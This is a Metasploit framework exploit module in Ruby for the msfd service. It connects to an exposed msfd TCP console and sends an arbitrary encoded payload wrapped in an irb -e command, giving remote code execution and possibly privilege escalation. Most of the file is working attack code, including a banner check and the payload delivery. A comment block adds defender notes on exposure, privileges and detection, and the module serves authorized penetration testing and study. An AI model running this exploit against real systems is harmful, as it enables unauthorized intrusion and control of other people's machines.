rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/misc/msfd_rce_remote.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
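# Module for an msfd service whose console socket is reachable over TCP.
#
# What the code below shows: after connecting and reading the banner, the
# module writes a single console line (`irb -e '...'`) and no authentication
# step takes place in that exchange. The underlying weakness is therefore
# exposure of the msfd socket itself.
#
# Defender notes (derived from the module's own description and traffic):
# - Keep the msfd listener off remotely reachable interfaces and restrict it
#   with host firewall rules.
# - Do not run msfd with more privileges than the users who can reach it,
#   since the description names local privilege escalation as a second use.
# - Inbound connections to the msfd port (default registered here: 55554)
#   carrying a line that starts with `irb -e` are a usable detection signal.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the default remote port.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Metasploit msfd Remote Code Execution',
        'Description' => %q{
          Metasploit's msfd-service makes it possible to get a msfconsole-like
          interface over a TCP socket. If this socket is accessible on a remote
          interface, an attacker can execute commands on the victim's machine.

          If msfd is running with higher privileges than the current local user,
          this module can also be used for privilege escalation. In that case,
          port forwarding on the compromised host can be used.

          Code execution is achieved with the msfconsole command: irb -e 'CODE'.
        },
        'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
        'License' => BSD_LICENSE,
        'Platform' => "ruby",
        'Arch' => ARCH_RUBY,
        'Payload' => {
          'Space' => 8192, # Arbitrary limit
          # 0x27 (single quote) and 0x0a (newline) are excluded because the
          # command line sent in #exploit wraps the code in single quotes and
          # terminates it with a newline.
          'BadChars' => "\x27\x0a",
          'DisableNops' => true
        },
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2018-04-11', # Vendor notification
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(55554)
      ]
    )
  end

  # Reads the service banner and reports whether it looks like an msfd console.
  #
  # The test is only a substring match on "msf", so a positive result is
  # reported as Appears; nothing beyond the banner is verified.
  #
  # @return [Exploit::CheckCode] Appears when the banner contains "msf",
  #   Unknown when it does not or when no banner was received
  def check
    connect
    begin
      data = sock.get_once
      # get_once can yield nil when the peer sends nothing; without this guard
      # the include? call below would raise NoMethodError instead of reporting.
      return Exploit::CheckCode::Unknown if data.nil?
      return Exploit::CheckCode::Appears if data.include?("msf")

      Exploit::CheckCode::Unknown
    ensure
      # Always release the socket, including when the read raises.
      disconnect
    end
  end

  # Sends the encoded payload as a single `irb -e '...'` console line.
  #
  # The banner is read and discarded first; the quoting relies on the
  # BadChars declared in #initialize.
  def exploit
    connect
    sock.get_once
    sock.put "irb -e '" + payload.encoded + "'\n"
    disconnect
  end
end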